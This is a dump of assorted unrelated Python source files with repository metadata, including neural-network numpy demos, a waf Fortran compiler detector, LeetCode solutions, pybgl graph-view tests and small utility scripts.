    # Three-neuron layer as a matrix-vector product: np.dot computes one
    # dot product per weight row.
    inputs = [1.0, 2.0, 3.0, 2.5]
    weights = [
        [0.2, 0.8, -0.5, 1],
        [0.5, -0.91, 0.26, -0.5],
        [-0.26, -0.27, 0.17, 0.87],
    ]
    biases = [2.0, 3.0, 0.5]
    print(np.dot(weights, inputs) + biases)
def matrix_product():
    # (1x3) row vector times (3x1) column vector -> 1x1 matrix [[20]].
    row = np.array([[1, 2, 3]])
    col = np.array([[2, 3, 4]]).T
    print(np.dot(row, col))
def three_neurons_batched_numpy():
    # A batch of three input samples through the same three-neuron layer:
    # (batch x features) @ (features x neurons) + biases.
    inputs = [[1.0, 2.0, 3.0, 2.5], [2.0, 5.0, -1.0, 2.0], [-1.5, 2.7, 3.3, -0.8]]
    weights = [
        [0.2, 0.8, -0.5, 1.0],
        [0.5, -0.91, 0.26, -0.5],
        [-0.26, -0.27, 0.17, 0.87],
    ]
    biases = [2.0, 3.0, 0.5]
    print(np.dot(inputs, np.array(weights).T) + biases)
| [
"shao.zhongren@gmail.com"
] | shao.zhongren@gmail.com |
cb83f3868e5f1ba544615d3cbf9eae9e7a063a65 | 861d25fe3985340dae621d179f7af368e0dd7f39 | /stockweb/stock/maintest.py | b0e4d03f456e78a8ad2feb9e649b08d85c6fec21 | [] | no_license | zhuwei302/python | 1ebcfac3e4f208ba81af93d13b8857bea9497862 | dfad635149b8f307ae0eb5b2b8c348843de663bb | refs/heads/master | 2021-01-19T18:44:32.843216 | 2018-09-18T15:17:21 | 2018-09-18T15:17:21 | 101,160,521 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2016/12/20 0020 17:36
# @Author : Aries
# @Site :
# @File : maintest.py
# @Software: PyCharm
if __name__=='__main__':
    # Python 2 script: sorts a {code: ratio} dict by value (ascending) and
    # rebuilds it with rank-prefixed keys like "0--60003".
    dic = {'000001':1.32,'20002':1.24,'60003':1.0,'60005':2.1}
    new_dic = {}
    # sorted() over iteritems() yields (key, value) pairs ordered by value.
    l = sorted(dic.iteritems(), key=lambda d: d[1], reverse=False)
    for i in range(len(l)):
        if len(l[i])==2:  # always true: iteritems() yields 2-tuples
            new_dic[str(i)+'--'+l[i][0]] = l[i][1]
    # Print values in arbitrary dict order, then the whole mapping.
    for key in new_dic.keys():
        print new_dic.get(key)
    print new_dic
"244840434@qq.com"
] | 244840434@qq.com |
7c1956434714aa0adb907492eb23dcfe1ac80279 | 9f5c2728b1ab844bf3110cce78e4083283943ebb | /DataVisualization/chapter_15/dice_visual.py | dc0f108511ae1e6222c4a75f07bb80d88ee689de | [] | no_license | leetuckert10/CrashCourse | 9838448e75636132169498f152200651a05181c4 | 3f35958de497026da5e7d0d0a52fe3f20f2ef196 | refs/heads/master | 2023-05-01T11:56:27.382141 | 2020-04-02T19:11:07 | 2020-04-02T19:11:07 | 249,979,785 | 0 | 0 | null | 2023-04-21T20:48:10 | 2020-03-25T13:01:08 | Python | UTF-8 | Python | false | false | 1,857 | py | # dice_visual.py
# This version and the Die class have enhancements beyond what was laid out
# in Crash Course such that rolling multiple dice is made much easier. You
# only change the number of dice in one place.
from typing import List, Dict
from plotly.graph_objects import Bar, Layout # type: ignore
from plotly import offline # type: ignore
from die import Die
# Create multi-sided dice.
num_dice: int = 6
num_sides: int = 6
num_rolls: int = 500_000
max_result: int = 0
for x in range(1, num_dice + 1):
    die = Die(num_sides)
    # max_result accumulates the largest possible total across all dice.
    # NOTE(review): each Die presumably registers itself in Die.instances
    # (used below) — confirm against the Die class.
    max_result = max_result + die.num_sides
# Roll all the dice num_rolls times and store the sum of each roll.
results: List[int] = []
result: int = 0
for roll in range(1, num_rolls + 1):
    for die in Die.instances:
        result = result + die.roll()
    results.append(result)
    result = 0
# Analyze the results. Bar() needs a list of values in the call to it.
# (results.count in a loop is O(n*m); fine here, but a Counter would scale better.)
frequencies: List[int] = []
for value in range(num_dice, max_result + 1):
    frequencies.append(results.count(value))
# The sum of all sides is the maximum number that can be returned and the
# minimum number that can only be 1 times the number of dice.
# Convert the range of sides to a list for the call to Bar().
x_values: List[int] = list(range(num_dice, max_result + 1))
data: List[Bar] = [Bar(x=x_values, y=frequencies)]
# The 'dtick' dictionary argument tells Plotly to label every tick mark.
x_axis_config: Dict = {'title': 'Result', 'dtick': 1}
y_axis_config: Dict = {'title': 'Frequency of Result'}
title_str: str = f"Results of rolling {num_dice} D{num_sides} {num_rolls} " \
                 f"times."
my_layout: Layout = Layout(title=title_str, xaxis=x_axis_config,
                           yaxis=y_axis_config)
offline.plot({'data': data, 'layout': my_layout}, filename='d6_d6.html')
| [
"n4tlt.radio@gmail.com"
] | n4tlt.radio@gmail.com |
c16f345b9e70eca292351541d6fcb0f362b90723 | 2c4763aa544344a3a615f9a65d1ded7d0f59ae50 | /waflib/Tools/compiler_fc.py | a2a3032ab4e091a185ac288c0cd38ca181ebc167 | [] | no_license | afeldman/waf | 572bf95d6b11571bbb2941ba0fe463402b1e39f3 | 4c489b38fe1520ec1bc0fa7e1521f7129c20f8b6 | refs/heads/master | 2021-05-09T18:18:16.598191 | 2019-03-05T06:33:42 | 2019-03-05T06:33:42 | 58,713,085 | 0 | 0 | null | 2016-05-13T07:34:33 | 2016-05-13T07:34:33 | null | UTF-8 | Python | false | false | 2,235 | py | #!/usr/bin/env python
# encoding: utf-8
import re
from waflib import Utils, Logs
from waflib.Tools import fc
fc_compiler = {
	'win32'  : ['gfortran','ifort'],
	'darwin' : ['gfortran', 'g95', 'ifort'],
	'linux'  : ['gfortran', 'g95', 'ifort'],
	'java'   : ['gfortran', 'g95', 'ifort'],
	'default': ['gfortran'],
	'aix'    : ['gfortran']
}
"""
Dict mapping the platform names to lists of names of Fortran compilers to try, in order of preference::

	from waflib.Tools.compiler_fc import fc_compiler
	fc_compiler['linux'] = ['gfortran', 'g95', 'ifort']
"""
# Fixed the docstring example: it previously referenced compiler_c /
# c_compiler (a copy-paste from the C tool) instead of this module's
# fc_compiler dict.
def default_compilers():
	"""Return a space-separated string of Fortran compiler names to try
	on the current platform, in order of preference."""
	platform = Utils.unversioned_sys_platform()
	candidates = fc_compiler.get(platform, fc_compiler['default'])
	return ' '.join(candidates)
def configure(conf):
	"""
	Detects a suitable Fortran compiler

	:raises: :py:class:`waflib.Errors.ConfigurationError` when no suitable compiler is found
	"""
	try:
		# Command-line preference wins; otherwise use the platform defaults.
		test_for_compiler = conf.options.check_fortran_compiler or default_compilers()
	except AttributeError:
		conf.fatal("Add options(opt): opt.load('compiler_fc')")
	# Try each candidate (space/comma separated) until one configures.
	for compiler in re.split('[ ,]+', test_for_compiler):
		# stash/revert keeps conf.env clean when a candidate fails.
		conf.env.stash()
		conf.start_msg('Checking for %r (Fortran compiler)' % compiler)
		try:
			conf.load(compiler)
		except conf.errors.ConfigurationError as e:
			conf.env.revert()
			conf.end_msg(False)
			Logs.debug('compiler_fortran: %r', e)
		else:
			# The tool loaded, but only accept it if it actually set FC.
			if conf.env.FC:
				conf.end_msg(conf.env.get_flat('FC'))
				conf.env.COMPILER_FORTRAN = compiler
				conf.env.commit()
				break
			conf.env.revert()
			conf.end_msg(False)
	else:
		# for/else: no candidate succeeded.
		conf.fatal('could not configure a Fortran compiler!')
def options(opt):
	"""
	This is how to provide compiler preferences on the command-line::

		$ waf configure --check-fortran-compiler=ifort
	"""
	compilers = default_compilers()
	opt.load_special_tools('fc_*.py')
	group = opt.add_option_group('Configuration options')
	group.add_option('--check-fortran-compiler', default=None,
		help='list of Fortran compiler to try [%s]' % compilers,
		dest="check_fortran_compiler")
	for name in compilers.split():
		opt.load('%s' % name)
| [
"anton.feldmann@outlook.de"
] | anton.feldmann@outlook.de |
fbe16676768a4832f58e641a6e26c7336eb8ee39 | 321b4ed83b6874eeb512027eaa0b17b0daf3c289 | /1029/1029.two-city-scheduling.233252483.Accepted.leetcode.py | ff9ecc8ea5b98d76c93e827e263c8240e0de39b0 | [] | no_license | huangyingw/submissions | 7a610613bdb03f1223cdec5f6ccc4391149ca618 | bfac1238ecef8b03e54842b852f6fec111abedfa | refs/heads/master | 2023-07-25T09:56:46.814504 | 2023-07-16T07:38:36 | 2023-07-16T07:38:36 | 143,352,065 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | class Solution(object):
def twoCitySchedCost(self, costs):
result = 0
costs = sorted(costs, key=lambda x: x[0] - x[1])
for index in range(len(costs)):
if index < len(costs) // 2:
result += costs[index][0]
else:
result += costs[index][1]
return result
| [
"huangyingw@gmail.com"
] | huangyingw@gmail.com |
8db86b66c9fff23e9398a22702a42bbb242c2967 | 8ef5a09d76a11c56963f18e6a08474a1a8bafe3c | /leet_code/371. Sum of Two Integers.py | de6f6d30d4cd6e9f11ea559e4459cd6409de9100 | [] | no_license | roiei/algo | 32c4677649c7666db148f6183fbfbf66c8b1969f | ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec | refs/heads/master | 2022-04-01T19:21:27.768675 | 2022-02-19T06:15:29 | 2022-02-19T06:15:29 | 169,021,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
import heapq
from typing import List
class Solution:
    def getSum(self, a: int, b: int) -> int:
        """Return a + b without using + or -, emulating 32-bit two's
        complement arithmetic with bitwise operators.

        Python ints are unbounded, so every intermediate value is masked
        to 32 bits; a final fix-up reinterprets the unsigned result as a
        signed 32-bit integer.
        """
        MASK = 0xFFFFFFFF  # 32-bit mask (the original used a 33-bit one)
        while b != 0:
            # XOR = bitwise sum without carries; (a & b) << 1 = the carries.
            # Both must be computed from the SAME (a, b) pair, hence the
            # simultaneous tuple assignment.  The original updated `a`
            # first and then derived the carry from the new value, which
            # made e.g. getSum(1, 2) return -1 instead of 3.
            a, b = (a ^ b) & MASK, ((a & b) << 1) & MASK
        # Values above 0x7FFFFFFF encode negative 32-bit numbers.
        return a if a <= 0x7FFFFFFF else ~(a ^ MASK)
# Ad-hoc smoke checks: each line prints whether getSum matches the expected
# sum, followed by the wall-clock time taken by the two calls.
stime = time.time()
print(3 == Solution().getSum(a = 1, b = 2))
print(1 == Solution().getSum(a = -2, b = 3))
print('elapse time: {} sec'.format(time.time() - stime))
| [
"hyoukjea.son@hyundai.com"
] | hyoukjea.son@hyundai.com |
341fc784d325d2865edbc349b267f8280aaf7129 | d2aae22870acefa1353dca86351ae94217d0f026 | /12.reinforcement_learning_with_mario_bros/2023/hard_coding/2.0.clustering_images.py | 952824e83fbf69324924dfe264774515a1224b4f | [
"MIT"
] | permissive | yingshaoxo/ML | 9c3169f2f8c7e98e0ad5ddc56fe81797a10df420 | 038fb5afe017b82334ad39a256531d2c4e9e1e1a | refs/heads/master | 2023-08-03T10:51:30.779007 | 2023-08-02T17:45:30 | 2023-08-02T17:45:30 | 137,086,679 | 5 | 1 | MIT | 2023-05-16T10:31:28 | 2018-06-12T14:49:58 | Python | UTF-8 | Python | false | false | 1,810 | py | from auto_everything.disk import Disk
# Greedy near-duplicate image clustering: images whose MS-SSIM similarity is
# at least `relation_rate` are grouped into the same class, and each class is
# copied into its own numbered sub-folder of "seperated_classes".
disk = Disk()

from sewar.full_ref import msssim, uqi
import cv2

# Input images live next to this script in ./raw_images; groups are written
# to ./seperated_classes/<class index>/.
current_folder = disk.get_directory_path(__file__)
output_folder = disk.join_paths(current_folder, "seperated_classes")
disk.create_a_folder(output_folder)

#images = disk.get_files(folder=disk.join_paths(current_folder, "raw_seperate_images"))
images = disk.get_files(folder=disk.join_paths(current_folder, "raw_images"))
# Load everything up front: file path -> decoded image array.
images_dict = {image_path:cv2.imread(image_path) for image_path in images}

relation_rate = 0.95  # minimum MS-SSIM score for two images to share a class

classes = {}  # class index -> list of member file paths
index = 0
for image_path_1 in list(images_dict.keys()).copy():
    # Entries are deleted from images_dict as they are assigned to classes,
    # so membership must be re-checked on every iteration.
    if image_path_1 not in images_dict.keys():
        continue
    image_1 = images_dict[image_path_1]
    for image_path_2 in list(images_dict.keys()).copy():
        if image_path_2 not in images_dict.keys():
            continue
        if image_path_1 != image_path_2:
            image_2 = images_dict[image_path_2]
            similarity = msssim(image_1, image_2)
            # print(similarity)
            if similarity >= relation_rate:
                # print("found")
                # print(image_path_1)
                # print(image_path_2)
                # exit()
                # Lazily create the class on the first match.
                if index not in classes.keys():
                    classes[index] = []
                classes[index].append(image_path_2)
                del images_dict[image_path_2]
    if index in classes.keys():
        # At least one match found: the anchor image joins its own class and
        # the whole group is copied into <output_folder>/<index>/.
        classes[index].append(image_path_1)
        del images_dict[image_path_1]
        # copy images to related folder
        for path in classes[index]:
            disk.copy_a_file(path, disk.join_paths(output_folder, str(index), disk.get_file_name(path)) )
        print(f"index {index} done.")
        index += 1
    else:
        # NOTE(review): reaching this branch means the current image matched
        # nothing — and the break stops clustering for ALL remaining images,
        # not just this one.  Confirm that aborting (rather than `continue`)
        # is the intended behavior.
        # finished
        break
print("Done.") | [
"yingshaoxo@gmail.com"
] | yingshaoxo@gmail.com |
cafdf9e580d62bc12021c2f8ceb4516dfe36b24a | 3d0a2390047e0ede5df661255f6e72fab5d534f2 | /blog/urls.py | 9ddb0b0677e59536ec59685841269e5d21058474 | [] | no_license | sompodsign/Django_Personal_portfolio | 5f932e3ba27f802768735d6f91ef105ad168289a | 9e833a7728f46cd33c2f512a3840e70f49a2dd08 | refs/heads/master | 2022-12-12T01:59:14.770507 | 2020-08-31T07:45:41 | 2020-08-31T07:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py |
from django.urls import path
from blog import views
app_name = 'blog'
urlpatterns = [
path('', views.all_blogs, name='all_blogs'),
path('<int:blog_id>/', views.detail, name='detail'),
]
| [
"sompodsign@gmail.com"
] | sompodsign@gmail.com |
134719d8c196e98b85190c6ef8ddb801276374aa | 8acb7f5f98217fc3aacaaefa104c499627e90aae | /0x0B_redis_basic/exercise.py | cd0c1f852150144cd3eb35a5847e233b07baeb49 | [] | no_license | zulsb/holbertonschool-web_back_end | cb756386382eaaff373a37732247ca8d2c5f7a18 | 15931a555a28ed3bed5822d0f8b4b4c9a5f6a985 | refs/heads/main | 2023-05-06T00:52:40.278552 | 2021-05-22T21:33:15 | 2021-05-22T21:33:15 | 305,504,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | #!/usr/bin/env python3
""" Redis module.
"""
import redis
import uuid
from functools import wraps
from sys import byteorder
from typing import Union, Optional, Callable
def count_calls(method: Callable) -> Callable:
    """Decorator that bumps a Redis counter, keyed by the wrapped
    method's qualified name, on every invocation before delegating.
    """
    counter_key = method.__qualname__

    @wraps(method)
    def wrapper(self, *args, **kwargs):
        """Increment the call counter, then run the real method."""
        self._redis.incr(counter_key)
        return method(self, *args, **kwargs)

    return wrapper
def call_history(method: Callable) -> Callable:
    """Decorator that records every call's positional arguments and
    return value in the Redis lists "<qualname>:inputs" and
    "<qualname>:outputs".
    """
    base_key = method.__qualname__

    @wraps(method)
    def wrapper(self, *args):
        """Log the inputs, invoke the method, log and return the output."""
        self._redis.rpush(base_key + ":inputs", str(args))
        result = method(self, *args)
        self._redis.rpush(base_key + ":outputs", str(result))
        return result

    return wrapper
def replay(method: Callable):
    """ Method that display the history of calls
    of a particular bound method.
    """
    # `method` is a bound method of Cache, so __self__ yields the instance
    # (and therefore the Redis connection) it belongs to.
    r = method.__self__._redis
    keys = method.__qualname__
    # Input/output logs are the lists written by the call_history decorator.
    inputs = r.lrange("{}:inputs".format(keys), 0, -1)
    outputs = r.lrange("{}:outputs".format(keys), 0, -1)
    # The plain counter under the bare qualname is kept by count_calls.
    print("{} was called {} times:".format(keys,
                                           r.get(keys).decode("utf-8")))
    # Redis returns bytes; decode each logged input/output pair for display.
    for i, j in list(zip(inputs, outputs)):
        print("{}(*{}) -> {}".format(keys, i.decode("utf-8"),
                                     j.decode("utf-8")))
class Cache:
    """Thin key/value cache backed by a Redis connection."""

    def __init__(self):
        """Open a Redis connection and wipe the current database."""
        self._redis = redis.Redis()
        self._redis.flushdb()

    @count_calls
    @call_history
    def store(self, data: Union[str, bytes, int, float]) -> str:
        """Store *data* under a freshly generated UUID key.

        Returns:
            The random key as a string.
        """
        new_key = str(uuid.uuid4())
        self._redis.set(new_key, data)
        return new_key

    def get(self, key: str, fn: Optional[Callable] = None):
        """Fetch the value stored at *key*.

        When *fn* is supplied, the raw bytes are passed through it so the
        caller gets the value back in the desired type.
        """
        raw = self._redis.get(key)
        if fn:
            return fn(raw)
        return raw

    def get_str(self, data: bytes) -> str:
        """Decode raw Redis bytes as UTF-8 text."""
        return data.decode("utf-8")

    def get_int(self, data: bytes) -> int:
        """Rebuild an int from raw bytes using the native byte order."""
        return int.from_bytes(data, byteorder)
| [
"zulsb2093@gmail.com"
] | zulsb2093@gmail.com |
a7735f2687501d0c866a019685343953dd831d98 | aca209472c7288d69adf57124c197baf98c7a6e7 | /OpenCV讀者資源/讀者資源/程式實例/ch9/ch9_12.py | 100c8a3ac4fffab2f56bfd9d003d3496ab4b1ea9 | [] | no_license | Hank-Liao-Yu-Chih/document | 712790325e48b9d8115d04b5cc2a90cd78431e61 | fafe616678cd224e70936296962dcdbbf55e38b3 | refs/heads/master | 2022-09-22T12:40:33.284033 | 2022-09-08T00:33:41 | 2022-09-08T00:33:41 | 102,203,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | # ch9_12.py
# Demonstrate cv2.threshold with THRESH_TOZERO on a random 3x5 uint8 matrix:
# pixels above `thresh` keep their value, pixels at or below it become 0.
import cv2
import numpy as np

thresh = 127  # threshold value
maxval = 255  # maximum pixel value (required by the API)
src = np.random.randint(0,256,size=[3,5],dtype=np.uint8)
ret, dst = cv2.threshold(src,thresh,maxval,cv2.THRESH_TOZERO)
print(f"src =\n {src}")
print(f"threshold = {ret}")
print(f"dst =\n {dst}")
| [
"hank.liao@vicorelogic.com"
] | hank.liao@vicorelogic.com |
ffd1dd4408a8e7560f6281565bad2cef09a337d5 | 56cce3fee2e3d69d60958eb2aacc4f65fc3d2230 | /tests/test_graph_view.py | 2bcd8da7e69e4d68de3118a177d781ae621ceca7 | [
"BSD-3-Clause"
] | permissive | nokia/PyBGL | 52c2f175d1dbccb15519f8a16de141845d0abaf3 | 707f2df32ede7d9a992ea217a4791da34f13e138 | refs/heads/master | 2023-08-08T04:46:24.931627 | 2023-08-03T16:31:35 | 2023-08-03T16:31:35 | 148,536,169 | 12 | 3 | BSD-3-Clause | 2023-08-03T16:31:36 | 2018-09-12T20:11:36 | Python | UTF-8 | Python | false | false | 3,228 | py | #!/usr/bin/env pytest-3
# -*- coding: utf-8 -*-
from pybgl.graph import DirectedGraph
from pybgl.graph_view import GraphView
from pybgl.html import html
from pybgl.ipynb import ipynb_display_graph
from pybgl.property_map import make_func_property_map
def make_graph() -> DirectedGraph:
    """Return a directed path over 10 vertices: 0 -> 1 -> ... -> 9."""
    graph = DirectedGraph(10)
    for u in graph.vertices():
        if u + 1 < graph.num_vertices():
            graph.add_edge(u, u + 1)
    return graph
def test_graph_view_default():
    """An unfiltered GraphView must mirror the underlying graph; vertex- and
    edge-filtered views must expose the expected reduced counts."""
    print("test_graph_view_default")
    g = make_graph()
    gv = GraphView(g)
    e = next(iter(gv.edges()))
    print(e)
    # The first edge of the path graph is 0 -> 1.
    assert gv.source(e) == 0
    assert gv.target(e) == 1
    html("gv")
    ipynb_display_graph(gv)
    # With no filters the view is indistinguishable from the graph itself.
    assert set(g.vertices()) == set(gv.vertices())
    assert set(g.edges()) == set(gv.edges())
    assert set(g.out_edges(0)) == set(gv.out_edges(0))
    assert g.out_degree(0) == gv.out_degree(0)
    # Keep only vertices whose index is not a multiple of 3.
    gv1 = GraphView(
        g,
        pmap_vrelevant=make_func_property_map(
            lambda u: bool(u % 3 != 0)
        )
    )
    html("gv1")
    ipynb_display_graph(gv1)
    assert gv1.num_vertices() == 6
    assert gv1.num_edges() == 3
    # Keep only edges whose source vertex is odd.
    gv2 = GraphView(
        g,
        pmap_erelevant=make_func_property_map(
            lambda e: bool(gv.source(e) % 2)
        )
    )
    html("gv2")
    ipynb_display_graph(gv2)
    # Edge filtering leaves the vertex set untouched.
    assert set(g.vertices()) == set(gv2.vertices())
    assert set(g.edges()) != set(gv2.edges())
    assert gv2.num_vertices() == g.num_vertices()
    assert gv2.num_edges() == 4
def test_graph_view_or():
    """The union (|) of two vertex-filtered views keeps every vertex kept by
    either view; only vertex 5 is excluded by both filters here."""
    print("test_graph_view_or")
    g = make_graph()
    gv1 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u < 5))
    gv2 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 5))
    gv = gv1 | gv2
    html("gv1")
    ipynb_display_graph(gv1)
    html("gv2")
    ipynb_display_graph(gv2)
    html("gv1 | gv2")
    ipynb_display_graph(gv)
    assert gv.num_vertices() == 9
    assert gv.num_edges() == 7
def test_graph_view_and():
    """The intersection (&) of two vertex-filtered views keeps only vertices
    accepted by both filters: here 3, 4 and 5."""
    g = make_graph()
    gv1 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 2))
    gv2 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u < 6))
    gv = gv1 & gv2
    html("gv1")
    ipynb_display_graph(gv1)
    html("gv2")
    ipynb_display_graph(gv2)
    html("gv1 & gv2")
    ipynb_display_graph(gv)
    assert set(g.vertices()) != set(gv.vertices())
    assert set(g.edges()) != set(gv.edges())
    # Boundary vertices lose edges that cross out of the kept range.
    assert set(g.out_edges(2)) != set(gv.out_edges(2))
    assert set(g.out_edges(3)) == set(gv.out_edges(3))
    assert set(g.out_edges(4)) == set(gv.out_edges(4))
    assert set(g.out_edges(5)) != set(gv.out_edges(5))
    assert gv.num_vertices() == 3
    assert gv.num_edges() == 2
def test_graph_view_sub():
    """The difference (-) of two vertex-filtered views keeps vertices of the
    first view not present in the second: here 3, 4, 5 and 6."""
    g = make_graph()
    gv1 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 2))
    gv2 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 6))
    gv = gv1 - gv2
    html("gv1")
    ipynb_display_graph(gv1)
    html("gv2")
    ipynb_display_graph(gv2)
    html("gv1 - gv2")
    ipynb_display_graph(gv)
    assert set(g.vertices()) != set(gv.vertices())
    assert set(g.edges()) != set(gv.edges())
    assert gv.num_vertices() == 4
    assert gv.num_edges() == 3
"marc-olivier.buob@nokia-bell-labs.com"
] | marc-olivier.buob@nokia-bell-labs.com |
99575b5054b6865d2ef7c17006529adf4923af07 | b683c8f1942a1ab35062620c6013b1e223c09e92 | /Python-Files/Day-3/Question-10.py | 726a1add98af17a4907c45fa6b21b3af0c4245a1 | [] | no_license | nihathalici/Break-The-Ice-With-Python | 601e1c0f040e02fe64103c77795deb2a5d8ff00a | ef5b9dd961e8e0802eee171f2d54cdb92f2fdbe8 | refs/heads/main | 2023-07-18T01:13:27.277935 | 2021-08-27T08:19:44 | 2021-08-27T08:19:44 | 377,414,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | """
Question 10
Question
Write a program that accepts a sequence of whitespace separated words as input and
prints the words after removing all duplicate words and sorting them alphanumerically.
Suppose the following input is supplied to the program:
hello world and practice makes perfect and hello world again
Then, the output should be:
again and hello makes perfect practice world
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input. We use the set container to remove duplicated data automatically and then use sorted() to sort the data.
"""
# Read whitespace-separated words from stdin, drop duplicates, and print the
# unique words sorted alphanumerically.
words = input().split()
# A set removes duplicates in one pass.  (The previous remove-while-iterating
# loop skipped elements after each removal and left extra copies behind
# whenever a word occurred more than twice.)
print(" ".join(sorted(set(words))))
| [
"noreply@github.com"
] | nihathalici.noreply@github.com |
b7f8fb45004f490bc91705b637f9448cc14d0759 | be84495751737bbf0a8b7d8db2fb737cbd9c297c | /sdl/strs.py | a1108190826b28e5da74d01537208ba9591cddbd | [] | no_license | mario007/renmas | 5e38ff66cffb27b3edc59e95b7cf88906ccc03c9 | bfb4e1defc88eb514e58bdff7082d722fc885e64 | refs/heads/master | 2021-01-10T21:29:35.019792 | 2014-08-17T19:11:51 | 2014-08-17T19:11:51 | 1,688,798 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,024 | py |
class Attribute:
    """
    Class represents an attribute (field) in a structure.
    """
    def __init__(self, name, path):
        self.name = name # name of struct
        self.path = path # path to member in struct
class Callable:
    """
    Class represents a function in the shading language.
    """
    def __init__(self, name, args):
        self.name = name  # function name
        self.args = args  # call arguments
class Const:
    """
    Class represents a constant (int, float).
    A Const can also hold a tuple of constants.
    """
    def __init__(self, const):
        self.const = const  # literal value, or a tuple of values
class Name:
    """
    Class represents a name (variable) in the shading language.
    """
    def __init__(self, name):
        self.name = name  # identifier text
class Subscript:
    """
    Class represents an item in an array.
    """
    def __init__(self, name, index, path=None):
        self.name = name
        self.index = index
        # if we have a path then this is an array in a struct
        self.path = path # path to member in struct
class NoOp:
    """
    In arithmetic and conditions, with this class we indicate that we are
    missing a left or right operand.
    """
    pass
class Operation:
    """
    One simple arithmetic operation: <left> <operator> <right>.
    """
    def __init__(self, left, operator, right):
        self.left, self.operator, self.right = left, operator, right
class Operations:
    """
    Class that holds a list of arithmetic operations.
    """
    def __init__(self, operations):
        self.operations = operations  # list of arithmetic operations
class Condition:
    """
    One simple logic condition: <left> <operator> <right>.
    """
    def __init__(self, left, operator, right):
        self.left, self.operator, self.right = left, operator, right
class Conditions:
    """
    Class that holds a list of logic conditions joined by logic operators.
    """
    def __init__(self, conditions, logic_ops):
        # n conditions are chained by exactly n - 1 logic operators
        assert len(conditions) == len(logic_ops) + 1
        self.conditions = conditions
        self.logic_ops = logic_ops
| [
"mvidov@yahoo.com"
] | mvidov@yahoo.com |
4af5f80e69b143b0cc55b7068cfba069e26fd17c | cdf969cadf53489b9c3d96a122232de947abc8a6 | /compute_video_frames_info.py | e0f4240fdcd0c6f26667fe0b5e9c9b40a39172b4 | [] | no_license | achalddave/charades-scripts | 021a0d2f2d2d4f41ba2c43fedf24b080c848ae34 | 9ec5bb3f1197a65a5a140242ba24a2c40074c8f4 | refs/heads/master | 2021-01-01T16:18:41.139194 | 2017-07-20T07:41:34 | 2017-07-20T07:41:34 | 97,805,792 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | """Output frames per second, number of frames for each video.
Output is a CSV file containing the entries
video,fps,num_frames
where video is the name of the video file without the extension.
"""
import argparse
import csv
import os
from moviepy.editor import VideoFileClip
from tqdm import tqdm
def main(video_paths_list, output_csv_path):
    """Write one `video,fps,num_frames` CSV row per video listed (one path
    per line) in *video_paths_list* to *output_csv_path*.  The `video`
    column is the file name without its extension."""
    with open(video_paths_list) as listing:
        paths = [entry.strip() for entry in listing]
    with open(output_csv_path, 'w') as out_file:
        writer = csv.DictWriter(out_file,
                                fieldnames=['video', 'fps', 'num_frames'])
        writer.writeheader()
        for path in tqdm(paths):
            clip = VideoFileClip(path)
            stem = os.path.splitext(os.path.basename(path))[0]
            writer.writerow({
                'video': stem,
                'fps': clip.fps,
                'num_frames': int(clip.fps * clip.duration),
            })
if __name__ == "__main__":
    # Use first line of file docstring as description if a file docstring
    # exists.
    parser = argparse.ArgumentParser(
        description=__doc__.split('\n')[0] if __doc__ else '',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument(
        'video_list',
        help='File containing new-line separated paths to videos.')
    # Destination path for the generated video,fps,num_frames CSV.
    parser.add_argument('output_csv')
    args = parser.parse_args()
    main(args.video_list, args.output_csv)
"achalddave@live.com"
] | achalddave@live.com |
c7654bcbf74e5ac7a50f79cc4d50fe959e0ae817 | a25aa09af984d08084a395f9b6df427d3756f11a | /diary/0826.py | 8dea9397a029b60bffa7bed54f684ceab3cd8574 | [] | no_license | luyihsien/leetcodepy | 31971e851a4ae77942a5d9e3ff07faea6e504c66 | a54bd09f4b28f106196a6cd8a0f9c056bcd237e6 | refs/heads/master | 2020-05-19T13:21:57.854086 | 2019-10-16T14:23:00 | 2019-10-16T14:23:00 | 185,037,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | import sys
# Lists are mutable: `b = a` aliases the same object, `b = b + [5]` rebinds
# b to a NEW list, while append() mutates the list b currently points at.
a=[1,2,3,4]
print(id(a))
b=a
b=b+[5]
b.append(5)
print(a,id(a))
print(b,id(b))
# Ints are immutable: a and b first share one object, then `b += 1` rebinds
# b to a different int object while a is unchanged.
a=5
b=a
print(id(a),id(b))
b+=1
print(id(b))
print(id(a))
print(a,b)
class ListNode:
    # Minimal singly linked list node: payload plus next pointer.
    def __init__(self,val):
        self.val=val
        self.next=None
# sys.getsizeof is shallow: a node's reported size does not grow when the
# objects it references (val / next) grow.
a=ListNode(5)
b=a
print(sys.getsizeof(a))
print(sys.getsizeof(a.val))
print(sys.getsizeof(a.next))
b.next=ListNode(400000)
print(sys.getsizeof(a))
print(sys.getsizeof(a.next.val))
b=b.next
print('b',sys.getsizeof(b))
b.next=ListNode(3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
print(sys.getsizeof(a))
# Big ints report a size that grows with the number of digits.
a=100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
print(sys.getsizeof(a))
a=1000# same size as a=1
print(sys.getsizeof(a))
print(sys.getsizeof(a)) | [
"luyihsien@gmail.com"
] | luyihsien@gmail.com |
